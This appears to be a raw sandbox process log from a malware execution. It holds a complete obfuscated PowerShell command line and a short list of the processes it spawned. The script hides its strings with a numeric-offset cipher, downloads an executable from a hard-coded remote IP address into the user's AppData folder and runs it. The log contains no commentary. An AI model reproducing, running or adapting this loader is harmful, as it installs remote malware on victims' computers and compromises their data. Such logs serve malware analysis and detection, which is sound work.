powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
2160svchost.exe "C:\Users\test22\AppData\Roaming\Auto%20R.exe"
2568netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
2624explorer.exe C:\Windows\Explorer.EXE
1236